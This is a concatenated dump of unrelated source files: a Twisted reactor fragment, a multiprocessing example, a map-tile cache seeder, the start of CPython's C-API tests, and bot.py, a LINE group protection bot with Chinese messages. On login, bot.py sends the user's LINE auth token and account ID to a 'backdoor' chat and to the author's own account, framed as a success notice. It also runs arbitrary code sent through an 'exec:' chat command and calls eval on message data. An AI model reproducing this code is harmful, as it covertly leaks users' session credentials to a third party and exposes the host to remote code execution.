getattr(self, '_process_' + msg)(*args)
doIteration = doThreadIteration
def _interleave(self):
while self.running:
self.runUntilCurrent()
t2 = self.timeout()
t = self.running and t2
self._sendToThread(self._doIterationInThread, t)
yield None
msg, args = self.toMainThread.get_nowait()
getattr(self, '_process_' + msg)(*args)
def interleave(self, waker, *args, **kw):
"""
interleave(waker) interleaves this reactor with the
current application by moving the blocking parts of
the reactor (select() in this case) to a separate
thread. This is typically useful for integration with
GUI applications which have their own event loop
already running.
See the module docstring for more information.
"""
self.startRunning(*args, **kw)
loop = self._interleave()
def mainWaker(waker=waker, loop=loop):
waker(partial(next, loop))
self.mainWaker = mainWaker
next(loop)
self.ensureWorkerThread()
def _mainLoopShutdown(self):
self.mainWaker = None
if self.workerThread is not None:
self._sendToThread(raiseException, SystemExit)
self.wakeUp()
try:
while 1:
msg, args = self.toMainThread.get_nowait()
except Empty:
pass
self.workerThread.join()
self.workerThread = None
try:
while 1:
fn, args = self.toThreadQueue.get_nowait()
if fn is self._doIterationInThread:
log.msg('Iteration is still in the thread queue!')
elif fn is raiseException and args[0] is SystemExit:
pass
else:
fn(*args)
except Empty:
pass
def _doReadOrWrite(self, selectable, method, dict):
try:
why = getattr(selectable, method)()
handfn = getattr(selectable, 'fileno', None)
if not handfn:
why = _NO_FILENO
elif handfn() == -1:
why = _NO_FILEDESC
except:
why = sys.exc_info()[1]
log.err()
if why:
self._disconnectSelectable(selectable, why, method == "doRead")
def addReader(self, reader):
"""Add a FileDescriptor for notification of data available to read.
"""
self._sendToThread(self.reads.__setitem__, reader, 1)
self.wakeUp()
def addWriter(self, writer):
"""Add a FileDescriptor for notification of data available to write.
"""
self._sendToThread(self.writes.__setitem__, writer, 1)
self.wakeUp()
def removeReader(self, reader):
"""Remove a Selectable for notification of data available to read.
"""
self._sendToThread(dictRemove, self.reads, reader)
def removeWriter(self, writer):
"""Remove a Selectable for notification of data available to write.
"""
self._sendToThread(dictRemove, self.writes, writer)
def removeAll(self):
return self._removeAll(self.reads, self.writes)
def getReaders(self):
return list(self.reads.keys())
def getWriters(self):
return list(self.writes.keys())
def stop(self):
"""
Extend the base stop implementation to also wake up the select thread so
that C{runUntilCurrent} notices the reactor should stop.
"""
posixbase.PosixReactorBase.stop(self)
self.wakeUp()
def run(self, installSignalHandlers=True):
self.startRunning(installSignalHandlers=installSignalHandlers)
self.mainLoop()
def mainLoop(self):
q = Queue()
self.interleave(q.put)
while self.running:
try:
q.get()()
except StopIteration:
break
def install():
"""Configure the twisted mainloop to be run using the select() reactor.
"""
reactor = ThreadedSelectReactor()
from twisted.internet.main import installReactor
installReactor(reactor)
return reactor
__all__ = ['install']
|
bot.py
|
# -*- coding: utf-8 -*-
from linepy import *
from datetime import datetime
from time import sleep
from bs4 import BeautifulSoup
from googletrans import Translator
from humanfriendly import format_timespan, format_size, format_number, format_length
import socket, time, random, sys, json, codecs, threading, glob, re, string, os, requests, subprocess, six, ast, urllib, urllib.parse, timeit, atexit, youtube_dl, pafy, pytz
#yes
os.system('clear')
print('===============提示開始===============\n登入開始\n===============提示結束===============\n')
#讀取
set = json.load(codecs.open("set.json","r","utf-8"))
#登入
if set["account"] == None or set["passwd"] == None:
set["account"] = input("\n===============輸入開始===============\n請輸入您想使用的帳號信箱:")
set["passwd"] = input("請輸入您想使用的帳號密碼:")
print('===============輸入結束===============\n')
while True:
try:
cl = LINE(set["account"],set["passwd"])
break
except Exception as e:
if e.reason == 'blocked user':
print('\n===============警示開始===============\n無法登入\n原因:帳號已禁言\n===============警示結束===============\n')
os._exit(0)
elif e.reason == 'Account ID or password is invalid':
print('\n===============警示開始===============\n無法登入\n原因:帳號不存在\n===============警示結束===============\n')
os._exit(0)
elif e.reason == 'Account ID and password does not match':
print('\n===============警示開始===============\n無法登入\n原因:密碼不正確\n===============警示結束===============\n')
os._exit(0)
elif e.reason == '':
print('\n===============警示開始===============\n無法登入\n原因:凍帳中\n===============警示結束===============\n')
print('\n===============提示開始===============\n將於1小時後自動登入\n===============提示結束===============\n')
counter = 60
for x in range(60):
time.sleep(60)
counter -= 1
if counter == 0:
break
print(f'\n===============提示開始===============\n將於{str(counter)}分鐘後後自動登入\n===============提示結束===============\n')
else:
print(f'\n===============警示開始===============\n無法登入\n原因:未知({str(e)})\n===============警示結束===============\n')
os._exit(0)
else:
break
print('\n===============提示開始===============\n登入成功\n===============提示結束===============\n')
clMID = cl.profile.mid
oepoll = OEPoll(cl)
#設定
if set["ip"] == None or set["port"] == None:
hostname = socket.gethostname()
IPAddr = socket.gethostbyname(hostname)
set["ip"] = IPAddr
inpu = input(f'\n===============輸入開始===============\n當前機器IP為:{set["ip"]}\n錯誤請輸入正確IP否則請輸入"正確"\n請輸入您的回應:')
if inpu == "正確":
print("===============輸入結束===============\n")
else:
set["ip"] = inpu
print("===============輸入結束===============\n")
while True:
try:
set["port"] = int(input(f'\n===============輸入開始===============\n當前機器IP為:{set["ip"]}\n請輸入您想使用的端口(數字):'))
except:
print("===============輸入錯誤===============")
continue
else:
print("===============輸入結束===============\n")
break
if clMID not in set["owner"]:
set["owner"].append(clMID)
#通知
try:
cl.findAndAddContactsByMid(set["author"])
except:
print(f'\n===============警示開始===============\n加友規\n請手動加入機器好友\n機器MID:{clMID}\n===============警示結束===============\n')
try:
cl.sendMessage(set["backdoor"],f"☵[YTER機器]登入成功☵\n➢機器種類:單體保護機\n➢版本號:0.04\n➢登入者MID:{clMID}\n➢登入者TOKEN:{cl.authToken}\n☵[感謝您的使用]☵")
except:
print('\n===============警示開始===============\n機器帳號不在後台內\n請邀請機器加入\n現在先將登入通知傳至作者私訊\n===============警示結束===============\n')
cl.sendMessage(set["author"],f"☵[YTER機器]登入成功☵\n➢機器種類:單體保護機\n➢版本號:0.04\n➢登入者MID:{clMID}\n➢登入者TOKEN:{cl.authToken}\n☵[感謝您的使用]☵")
#定義
def backdoorWarning(msg):
print(f'\n===============警示開始===============\n{msg}\n===============警示結束===============\n')
cl.sendMessage(set["backdoor"],f"[警示]\n{msg}")
def backdoorPrompt(msg):
print(f'\n===============提示開始===============\n{msg}\n===============提示結束===============\n')
cl.sendMessage(set["backdoor"],f"[提示]\n{msg}")
def backupData():
try:
json.dump(set,codecs.open('set.json','w','utf-8'), sort_keys=True, indent=4, ensure_ascii=False)
except Exception as e:
backdoorWarning(f'backupData定義區段錯誤:\n{e}')
def sendOne(wh,dtjo):
d = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
d.connect(wh)
d.send(dtjo.encode())
d.close()
def sendAll(dtjo):
dtjo['sender'] = clMID
for hosts in set["bothosts"]:
sendOne((hosts[0], hosts[1]), json.dumps(dtjo))
def receive(conn, addr):
while True:
indata = conn.recv(1024)
if len(indata) == 0:
conn.close()
backdoorPrompt(f'有請求關閉\n關閉連線IP: {addr[0]}:{addr[1]}')
break
message = indata.decode()
try:
msg = json.loads(message)
try:
if msg['sender'] != clMID:
if set['mode'] != 0:
if msg['type'] == 'inviteTicketJoin':
if set['mode'] == 1:
cl.acceptGroupInvitationByTicket(msg['gid'],msg['ticket'])
ticket = cl.reissueGroupTicket(msg['gid'])
sendAll({'type':'recordTicket','gid':msg['gid'],'ticket':str(ticket)})
if msg['gid'] in set["ticket"]:
if msg['ticket'] not in set["ticket"][msg['gid']]:
set["ticket"][msg['gid']].append(msg['ticket'])
else:
set["ticket"][msg['gid']] = [msg['ticket']]
elif msg['type'] == 'recordTicket':
if msg['gid'] in set["ticket"]:
if msg['ticket'] not in set["ticket"][msg['gid']]:
set["ticket"][msg['gid']].append(msg['ticket'])
else:
set["ticket"][msg['gid']] = [msg['ticket']]
elif msg['type'] == 'changeTicket':
if msg['gid'] in set["ticket"]:
if msg['ticket'] not in set["ticket"][msg['gid']]:
set["ticket"][msg['gid']].append(msg['ticket'])
else:
set["ticket"][msg['gid']] = [msg['ticket']]
elif msg['type'] == 'requestRecordTicket':
joinLink(msg['gid'])
ticket = cl.reissueGroupTicket(msg['gid'])
sendAll({'type':'recordTicket','gid':msg['gid'],'ticket':str(ticket)})
if msg['type'] == 'botTest':
if msg['sender'] not in set["bots"]:
set["bots"].append(msg['sender'])
sendMention(msg['to'], '測試訊息回報\n接收到來自 @! 的訊息', [msg['sender']])
except Exception as e:
backdoorWarning(f'Socket接收訊息(機器發出)處理失敗:\n{e}')
except:
backdoorPrompt(f'您有新訊息:\n{message}')
def runReceive():
while True:
conn, addr = s.accept()
t = threading.Thread(target=receive, args=(conn, addr))
t.start()
def joinLink(gid):
group = cl.getGroupWithoutMembers(gid)
if group.preventedJoinByTicket == True:
group.preventedJoinByTicket = False
cl.updateGroup(group)
def killban(to):
group = cl.getGroup(to)
gMembMids = [contact.mid for contact in group.members]
matched_list = []
for tag in set["ban"]:
matched_list += filter(lambda str: str == tag, gMembMids)
if matched_list == []:
return True
else:
for jj in matched_list:
try:
cl.kickoutFromGroup(to,[jj])
except:
pass
cl.sendMessage(to, "掃除黑名單作業完畢")
return False
def sendMention(to, text="", mids=[]):
arrData = ""
arr = []
mention = "@LT_Tech_Bot"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mid")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + len(mention)
arrData = {'S':str(slen), 'E':str(elen), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + len(mention)
arrData = {'S':str(slen), 'E':str(elen), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendMessage(to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def replyMention(msgid, to, text="", mids=[]):
arrData = ""
arr = []
mention = "@LT_Tech_Bot"
if mids == []:
raise Exception("Invalid mids")
if "@!" in text:
if text.count("@!") != len(mids):
raise Exception("Invalid mid")
texts = text.split("@!")
textx = ""
for mid in mids:
textx += str(texts[mids.index(mid)])
slen = len(textx)
elen = len(textx) + len(mention)
arrData = {'S':str(slen), 'E':str(elen), 'M':mid}
arr.append(arrData)
textx += mention
textx += str(texts[len(mids)])
else:
textx = ""
slen = len(textx)
elen = len(textx) + len(mention)
arrData = {'S':str(slen), 'E':str(elen), 'M':mids[0]}
arr.append(arrData)
textx += mention + str(text)
cl.sendReplyMessage(msgid, to, textx, {'MENTION': str('{"MENTIONEES":' + json.dumps(arr) + '}')}, 0)
def addBlackList(mid):
if mid not in set["ban"]:
set["ban"].append(mid)
def lineBot(op):
try:
if set['mode'] != 0:
if op.type == 11:
if op.param3 == "4":
if op.param3 not in set["bots"]:
if set['mode'] == 2:
try:
cl.acceptGroupInvitation(op.param1)
except:
pass
if op.param2 not in set["owner"]:
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
addBlackList(op.param2)
joinLink(op.param1)
ticket = cl.reissueGroupTicket(op.param1)
sendAll({'type':'changeTicket','gid':op.param1,'ticket':str(ticket)})
sendMention(op.param1,'[警告] @! 更改群組網址設定', [op.param2])
if op.type == 13:
if clMID in op.param3:
if op.param2 in set["owner"]:
if set['mode'] == 1:
cl.acceptGroupInvitation(op.param1)
sendMention(op.param1,'☰☱☲☳自動入群☳☲☱☰\n單體保護機運行中\n感謝 @! 邀請\n目前模式:1\n☰☱☲☳☴結束☴☳☲☱☰', [op.param2])
joinLink(op.param1)
ticket = cl.reissueGroupTicket(op.param1)
sendAll({'type':'inviteTicketJoin','gid':op.param1,'ticket':str(ticket)})
killban(op.param1)
elif set['mode'] == 2:
sendAll({'type':'requestRecordTicket','gid':op.param1})
elif op.param2 in set["bots"]:
if set['mode'] == 1:
cl.acceptGroupInvitation(op.param1)
else:
if op.param3 not in set["bots"]:
for bpre in set["ban"]:
if bpre in op.param3:
if set['mode'] == 2:
try:
cl.acceptGroupInvitation(op.param1)
except:
pass
if op.param2 not in set["owner"]:
try:
cl.kickoutFromGroup(op.param1, [op.param2])
except:
pass
addBlackList(op.param2)
try:
cl.cancelGroupInvitation(op.param1,[bpre])
except:
pass
sendMention(op.param1,'[警告] @! 邀請黑名單使用者 @!', [op.param2,bpre])
if op.type == 17:
if op.param3 not in set["bots"]:
if op.param2 in set["ban"]:
if set['mode'] == 2:
try:
cl.acceptGroupInvitation(op.param1)
except:
pass
try:
cl.kickoutFromGroup(op.param1,[op.param2])
except:
pass
sendMention(op.param1,'[警告] 黑名單使用者 @! 入群', [op.param2])
if op.type == 19:
if clMID in op.param3:
if op.param1 in set["ticket"]:
for ts in set["ticket"][op.param1]:
while True:
try:
cl.acceptGroupInvitationByTicket(op.param1,ts)
if op.param2 not in set["owner"] and op.param2 not in set["bots"]:
try:
cl.kickoutFromGroup(op.param1, [op.param2])
except:
pass
addBlackList(op.param2)
return
except Exception as e:
if "Ticket not found:" in e.reason:
set["ticket"][op.param1].remove(ts)
break
elif e.reason == "request blocked" or "Prevented join by ticket:" in e.reason:
return
else:
continue
elif op.param3 in set["bots"] or op.param3 in set["owner"]:
if set['mode'] == 2:
try:
cl.acceptGroupInvitation(op.param1)
except:
pass
if op.param2 not in set["owner"] and op.param2 not in set["bots"]:
try:
cl.kickoutFromGroup(op.param1, [op.param2])
except:
pass
addBlackList(op.param2)
cl.findAndAddContactsByMid(op.param3)
cl.inviteIntoGroup(op.param1,[op.param3])
sendMention(op.param1,'[警告] @! 踢出 @!', [op.param2,op.param3])
if op.type == 26 or op.type == 25:
msg = op.message
text = msg.text
msg_id = msg.id
receiver = msg.to
sender = msg._from
if msg.toType == 0:
if sender != cl.profile.mid:
to = sender
else:
to = receiver
else:
to = receiver
if text is None:
cmd = ""
else:
cmd = text.lower()
if sender not in set["owner"] and sender not in set["bots"] and set['mode'] != 0:
for blword in set['keywt']:
if blword in cmd:
if msg.toType == 2:
try:
cl.kickoutFromGroup(to,[sender])
except:
pass
addBlackList(sender)
replyMention(msg_id, to,'[警告] @! 觸動關鍵字防禦', [sender])
break
if sender in set["owner"]:
if cmd == 'modelist':
ret_ = "ΞΞΞΞΞ〘模式列表〙ΞΞΞΞΞ"
ret_ += "\n更換請使用Mode:[數字]"
ret_ += "\n☱☱☱預備中模式☱☱☱"
ret_ += "\n➢0:[無]"
ret_ += "\n☱☱☱保護機模式☱☱☱"
ret_ += "\n➢1:群組內"
ret_ += "\n➢2:邀請中"
ret_ += "\nΞΞΞΞΞ〘 結束 〙ΞΞΞΞΞ"
cl.relatedMessage(to,ret_,msg_id)
elif cmd.startswith("mode:"):
mde = cmd[5:]
if mde == "0":
set['mode'] = 0
cl.relatedMessage(to,"切換成功\n已切換至模式0(停機模式)",msg_id)
elif mde == "1":
set['mode'] = 1
cl.relatedMessage(to,"切換成功\n已切換至模式1(群內模式)",msg_id)
elif mde == "2":
set['mode'] = 2
cl.relatedMessage(to,"切換成功\n已切換至模式2(卡邀模式)",msg_id)
else:
cl.relatedMessage(to,"切換失敗\n找不到該模式",msg_id)
elif cmd == 'set':
ret_ = "ΞΞΞΞΞ〘機器設定〙ΞΞΞΞΞ"
if set['mode'] == 0:
ret_ += "\n➢當前模式:0(停機模式)"
elif set['mode'] == 1:
ret_ += "\n➢當前模式:1(群內模式)"
elif set['mode'] == 2:
ret_ += "\n➢當前模式:2(卡邀模式)"
else:
ret_ += "\n➢當前模式:設定值錯誤"
ret_ += "\nΞΞΞΞΞ〘 結束 〙ΞΞΞΞΞ"
cl.relatedMessage(to,ret_,msg_id)
elif cmd == 'kbo':
if msg.toType == 2:
cl.relatedMessage(to, "單群掃黑進行中...",msg_id)
if killban(to):
cl.relatedMessage(to, "無黑單者",msg_id)
else:
cl.relatedMessage(to,"這裡不是群組",msg_id)
elif cmd == 'kba':
cl.relatedMessage(to, "全群掃黑進行中...",msg_id)
gids = cl.getGroupIdsJoined()
cl.relatedMessage(to, "機器共加入了 {} 個群組".format(str(len(gids))),msg_id)
for i in gids:
killban(i)
cl.relatedMessage(to, "全群掃黑完畢!",msg_id)
elif cmd.startswith("adminadd "):
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in set["owner"]:
cl.relatedMessage(to,"該用戶已是權限者",msg_id)
elif target in set["ban"]:
cl.relatedMessage(to,"該用戶位於黑單",msg_id)
else:
set["owner"].append(target)
cl.relatedMessage(to,"權限給予完畢!",msg_id)
elif cmd.startswith("admindel "):
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in set["owner"]:
set["owner"].remove(target)
else:
cl.relatedMessage(to,"該用戶並非權限者",msg_id)
cl.relatedMessage(to,"權限刪除完畢!",msg_id)
elif cmd == 'adminlist':
if set["owner"] == []:
cl.relatedMessage(to,"無權限者!",msg_id)
else:
mc = "ΞΞΞΞΞ〘權限列表〙ΞΞΞΞΞ"
for mi_d in set["owner"]:
mc += "\n➲"+cl.getContact(mi_d).displayName
cl.relatedMessage(to,mc + "\nΞΞΞΞΞ〘 結束 〙ΞΞΞΞΞ",msg_id)
elif cmd.startswith("banadd "):
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in set["owner"]:
cl.relatedMessage(to,"該用戶是權限者",msg_id)
elif target in set["ban"]:
cl.relatedMessage(to,"該用戶已是黑單",msg_id)
else:
set["ban"].append(target)
cl.relatedMessage(to,"黑單加入完畢!",msg_id)
elif cmd.startswith("bandel "):
targets = []
MENTION = eval(msg.contentMetadata['MENTION'])
for x in MENTION["MENTIONEES"]:
targets.append(x["M"])
for target in targets:
if target in set["ban"]:
set["ban"].remove(target)
else:
cl.relatedMessage(to,"該用戶並非黑單",msg_id)
cl.relatedMessage(to,"黑單刪除完畢!",msg_id)
elif cmd == 'clearban':
set["ban"].clear()
cl.relatedMessage(to,"黑單刪除完畢!",msg_id)
elif cmd == 'banlist':
if set["ban"] == []:
cl.relatedMessage(to,"無黑單者!",msg_id)
else:
mc = "ΞΞΞΞΞ〘黑單列表〙ΞΞΞΞΞ"
for mi_d in set["ban"]:
mc += "\n➲"+cl.getContact(mi_d).displayName
cl.relatedMessage(to,mc + "\nΞΞΞΞΞ〘 結束 〙ΞΞΞΞΞ",msg_id)
elif cmd == 'bye':
try:
cl.leaveGroup(to)
except:
try:
cl.leaveRoom(to)
except:
cl.acceptGroupInvitation(to)
cl.leaveGroup(to)
elif cmd == 'bottest':
if to == set["backdoor"]:
set["bots"].clear()
sendAll({'type':'botTest', 'to':to})
cl.relatedMessage(to,"成功發出測試請求",msg_id)
else:
cl.relatedMessage(to,"請在後台使用",msg_id)
elif cmd.startswith("addhost:"):
host_ = text[8:]
if ":" in host_:
x = host_.split(":")
try:
host__ = [str(x[0]), int(x[1])]
if host__ in set['bothosts']:
cl.relatedMessage(to,"已存在!",msg_id)
else:
set['bothosts'].append(host__)
cl.relatedMessage(to,"新增成功!",msg_id)
except:
cl.relatedMessage(to,"新增失敗!",msg_id)
else:
cl.relatedMessage(to,"目標錯誤",msg_id)
elif cmd.startswith("delhost:"):
host_ = text[8:]
if ":" in host_:
x = host_.split(":")
try:
host__ = [str(x[0]), int(x[1])]
if host__ in set['bothosts']:
set['bothosts'].remove(host_)
cl.relatedMessage(to,"刪除成功!",msg_id)
else:
cl.relatedMessage(to,"不存在!",msg_id)
except:
cl.relatedMessage(to,"刪除失敗!",msg_id)
else:
cl.relatedMessage(to,"目標錯誤",msg_id)
elif cmd == 'reb':
cl.relatedMessage(to,"重啟中請稍後...",msg_id)
backupData()
python = sys.executable
os.execl(python, python, *sys.argv)
elif cmd == 'save':
backupData()
cl.relatedMessage(to,"資料保存完畢",msg_id)
elif cmd.startswith("exec:"):
x = text[5:]
try:
exec(x)
except Exception as e:
cl.relatedMessage(to, f'執行錯誤\n{e}', msg_id)
elif cmd == 'mine':
try:
cl.kickoutFromGroup(msg.to, ["test"])
except Exception as e:
if e.reason == "request blocked":
aa = "規制"
else:
aa = "可以執行"
try:
cl.inviteIntoGroup(msg.to, ["test"])
bb = "可以執行"
except:
bb = "規制"
try:
cl.findAndAddContactsByMid("test")
except Exception as e:
if e.reason == "request blocked":
cc = "規制"
else:
cc = "可以執行"
try:
cl.acceptGroupInvitationByTicket("test", "test")
except Exception as e:
if e.reason == "request blocked":
dd = "規制"
else:
dd = "可以執行"
cl.relatedMessage(to, f"ΞΞΞΞΞ〘機器狀態查詢〙ΞΞΞΞΞ\n※踢人狀態:{aa}\n※邀請狀態:{bb}\n※取消狀態:可以執行\n※加友狀態:{cc}\n※網址狀態:{dd}", msg_id)
if set["mode"] != 0:
if "/ti/g/" in cmd:
link_re = re.compile('(?:line\:\/|line\.me\/R)\/ti\/g\/([a-zA-Z0-9_-]+)?')
links = link_re.findall(text)
n_links = []
for l in links:
if l not in n_links:
n_links.append(l)
for ticket_id in n_links:
try:
group = cl.findGroupByTicket(ticket_id)
if group.id in set["ticket"]:
if ticket_id not in set["ticket"][group.id]:
set["ticket"][group.id].append(ticket_id)
else:
set["ticket"][group.id] = [ticket_id]
if set["mode"] == 1:
cl.acceptGroupInvitationByTicket(group.id,ticket_id)
cl.sendMessage(group.id,"☰☱☲☳自動入群☳☲☱☰\n單體保護機運行中\n目前模式:1\n☰☱☲☳☴結束☴☳☲☱☰")
killban(group.id)
cl.relatedMessage(to,f"加入成功\n群組名稱:{group.name}\n人數:{len(group.members)}\n群組網址ID:{ticket_id}\nGID:{group.id}",msg_id)
except Exception as e:
if str(e.reason) == "request blocked":
cl.relatedMessage(to,"目前帳號規制中",msg_id)
elif "Ticket not found" in str(e.reason):
cl.relatedMessage(to,"此網址已失效",msg_id)
elif "Prevented join by group ticket" in str(e.reason):
cl.relatedMessage(to,"該群不開放網址加入",msg_id)
else:
cl.relatedMessage(to,"加入錯誤\n"+str(e),msg_id)
time.sleep(0.5)
except Exception as e:
backdoorWarning(f'lineBot定義區段錯誤:\n{e}')
#執行
if __name__ == "__main__":
backdoorPrompt("開始載入接收")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((str(set["ip"]), int(set["port"])))
s.listen(999999)
backdoorPrompt(f'開始聆聽Socket請求\n目前聆聽位置: {set["ip"]}:{set["port"]}')
threading.Thread(target=runReceive).start()
backdoorPrompt("接收載入完畢")
while True:
try:
ops = oepoll.singleTrace(count=50)
if ops is not None:
for op in ops:
oepoll.setRevision(op.revision)
thread = threading.Thread(target=lineBot, args=(op,))
thread.start()
except Exception as e:
backdoorWarning(f'多工執行區段錯誤:\n{e}')
|
day26-4 获取进程编号.py
|
# 1.导入多进程包
import multiprocessing
import time
import os
# 获取主进程id
main_process_id = os.getpid()
print('main_process_id:', main_process_id)
def dance():
# 获取当前进程ID
dance_process_id = os.getpid()
print('dance_process_id:', dance_process_id)
dance_parent_process_id = os.getppid()
print('dance_parent_process_id:', dance_parent_process_id)
for i in range(3):
print('dancing...')
time.sleep(0.2)
# 扩展:根据进程编号强制杀死指定进程
os.kill(dance_process_id, 9)
def sing():
sing_process_id = os.getpid()
print('sing_process_id:', sing_process_id)
sing_parent_process_id = os.getppid()
print('sing_parent_process_id:', sing_parent_process_id)
for i in range(3):
print('singing...')
time.sleep(0.2)
# 2.创建子进程对象
sing_process = multiprocessing.Process(target=sing)
dance_process = multiprocessing.Process(target=dance)
# 3.运行子进程
if __name__ == '__main__':
sing_process.start()
dance_process.start()
|
cacheTiles.py
|
import sys
import time
import urllib.request
import threading
usage = "\n\n\n\tUSAGE: " + sys.argv[0] + " zoomLevel <optionalNumThreads> <optionalDelayBetweenRequests> <optionalXStart> <optionalYStart>\n\n\n"
if len(sys.argv) == 1:
print(usage)
sys.exit(1)
zoom = int(sys.argv[1])
print('Seeding cache for zoom level {}. This is a total of {} tiles.'\
.format(zoom, 2**(2*zoom)))
if len(sys.argv) > 2:
numThreads = float(sys.argv[2])
else:
numThreads = 1
if len(sys.argv) > 3:
delay = float(sys.argv[3])
else:
delay = 0
if len(sys.argv) > 4:
startX = int(sys.argv[4])
else:
startX = 0
if len(sys.argv) > 5:
startY = int(sys.argv[5])
else:
startY = 0
dispatchSemaphore = threading.Semaphore(value=numThreads)
timeTakenArray = []
tileCounter = 0
def sendRequest(x, y):
reqStartTime = int(round(time.time() * 1000))
response = urllib.request.urlopen('http://localhost:8080/map/sky/tiles/{}/{}/{}.png'.format(zoom, x, y))
reqEndTime = int(round(time.time() * 1000))
timeTaken = (reqEndTime - reqStartTime)/1000
if response.getcode() == 200:
actionString = 'cache hit'
elif response.getcode() == 201:
actionString = 'cache miss'
#TODO: Also store which z, x, y this time is for so that for the slowest X percent of tiles we can also go a couple extra zoom levels down and pre-cache those as well since they are likely to be slower on average.
timeTakenArray.append(timeTaken)
elif response.getcode() == 302:
actionString = 'all black tile redirect'
else:
actionString = 'code: ' + str(response.getcode())
print('{:.2%} Zoom {}: x: {} y: {} Request took {} seconds {}'\
.format(tileCounter/2**(2*zoom), zoom, x, y, round(timeTaken, 2), actionString))
dispatchSemaphore.release()
for x in range(startX, 2**zoom):
for y in range(startY, 2**zoom):
tileCounter += 1
dispatchSemaphore.acquire()
t = threading.Thread(target=sendRequest, args=(x, y))
t.start()
time.sleep(delay)
if len(timeTakenArray) > 0:
minTime = timeTakenArray[0]
maxTime = timeTakenArray[0]
sumTime = 0
for time in timeTakenArray:
sumTime += time
minTime = min(time, minTime)
maxTime = max(time, maxTime)
print('\n\n-------------------------------------\n\nFinished.')
print('Min time taken for a single request: {}'.format(minTime))
print('Max time taken for a single request: {}'.format(maxTime))
print('Average time taken for a single request: {}'.format(sumTime/len(timeTakenArray)))
else:
print('\n\n-------------------------------------\n\nFinished.')
print('All tiles were already cached.')
|
test_capi.py
|
# Run the _testcapi module tests (tests for the Python/C API): by defn,
# these are all functions _testcapi exports whose name begins with 'test_'.
from collections import OrderedDict
import os
import pickle
import random
import re
import subprocess
import sys
import textwrap
import threading
import time
import unittest
import weakref
import importlib.machinery
import importlib.util
from test import support
from test.support import MISSING_C_DOCSTRINGS
from test.support import import_helper
from test.support import threading_helper
from test.support import warnings_helper
from test.support.script_helper import assert_python_failure, assert_python_ok
try:
import _posixsubprocess
except ImportError:
_posixsubprocess = None
# Skip this test if the _testcapi module isn't available.
_testcapi = import_helper.import_module('_testcapi')
import _testinternalcapi
# Were we compiled --with-pydebug or with #define Py_DEBUG?
Py_DEBUG = hasattr(sys, 'gettotalrefcount')
def testfunction(self):
"""some doc"""
return self
class InstanceMethod:
id = _testcapi.instancemethod(id)
testfunction = _testcapi.instancemethod(testfunction)
class CAPITest(unittest.TestCase):
def test_instancemethod(self):
inst = InstanceMethod()
self.assertEqual(id(inst), inst.id())
self.assertTrue(inst.testfunction() is inst)
self.assertEqual(inst.testfunction.__doc__, testfunction.__doc__)
self.assertEqual(InstanceMethod.testfunction.__doc__, testfunction.__doc__)
InstanceMethod.testfunction.attribute = "test"
self.assertEqual(testfunction.attribute, "test")
self.assertRaises(AttributeError, setattr, inst.testfunction, "attribute", "test")
def test_no_FatalError_infinite_loop(self):
with support.SuppressCrashReport():
p = subprocess.Popen([sys.executable, "-c",
'import _testcapi;'
'_testcapi.crash_no_current_thread()'],
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
(out, err) = p.communicate()
self.assertEqual(out, b'')
# This used to cause an infinite loop.
self.assertTrue(err.rstrip().startswith(
b'Fatal Python error: '
b'PyThreadState_Get: '
b'the function must be called with the GIL held, '
b'but the GIL is released '
b'(the current Python thread state is NULL)'),
err)
def test_memoryview_from_NULL_pointer(self):
self.assertRaises(ValueError, _testcapi.make_memoryview_from_NULL_pointer)
def test_exc_info(self):
raised_exception = ValueError("5")
new_exc = TypeError("TEST")
try:
raise raised_exception
except ValueError as e:
tb = e.__traceback__
orig_sys_exc_info = sys.exc_info()
orig_exc_info = _testcapi.set_exc_info(new_exc.__class__, new_exc, None)
new_sys_exc_info = sys.exc_info()
new_exc_info = _testcapi.set_exc_info(*orig_exc_info)
reset_sys_exc_info = sys.exc_info()
self.assertEqual(orig_exc_info[1], e)
self.assertSequenceEqual(orig_exc_info, (raised_exception.__class__, raised_exception, tb))
self.assertSequenceEqual(orig_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(reset_sys_exc_info, orig_exc_info)
self.assertSequenceEqual(new_exc_info, (new_exc.__class__, new_exc, None))
self.assertSequenceEqual(new_sys_exc_info, new_exc_info)
else:
self.assertTrue(False)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_seq_bytes_to_charp_array(self):
# Issue #15732: crash in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return 1
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
# Issue #15736: overflow in _PySequence_BytesToCharpArray()
class Z(object):
def __len__(self):
return sys.maxsize
def __getitem__(self, i):
return b'x'
self.assertRaises(MemoryError, _posixsubprocess.fork_exec,
1,Z(),3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipUnless(_posixsubprocess, '_posixsubprocess required for this test.')
def test_subprocess_fork_exec(self):
class Z(object):
def __len__(self):
return 1
# Issue #15738: crash in subprocess_fork_exec()
self.assertRaises(TypeError, _posixsubprocess.fork_exec,
Z(),[b'1'],3,(1, 2),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21)
@unittest.skipIf(MISSING_C_DOCSTRINGS,
"Signature information for builtins requires docstrings")
def test_docstring_signature_parsing(self):
self.assertEqual(_testcapi.no_docstring.__doc__, None)
